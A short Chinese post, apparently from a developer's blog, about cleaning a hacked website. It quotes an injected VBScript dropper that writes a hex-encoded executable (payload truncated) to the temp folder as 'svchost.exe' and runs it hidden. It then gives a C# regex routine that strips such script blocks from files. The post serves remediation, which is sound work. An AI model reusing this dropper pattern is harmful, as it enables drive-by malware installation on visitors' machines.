网站被挂马了 ,挂马的形式千奇百怪
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000....(此处省略一万字)”Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>
用正则去把这段标签替换为空
public static bool checkStr(string path)
{ bool flag = false; var res = string.Empty; var regex = new Regex(@"<SCRIPT Language=VBScript>([\s\S]*)</SCRIPT>", RegexOptions.IgnoreCase); using (StreamReader sr = File.OpenText(path)) { res = sr.ReadToEnd(); } if (regex.IsMatch(res)) { res = regex.Replace(res, " "); Console.WriteLine("清理成功"); flag = true; WriteFile(path, res); } return flag; }以上用的是C#语言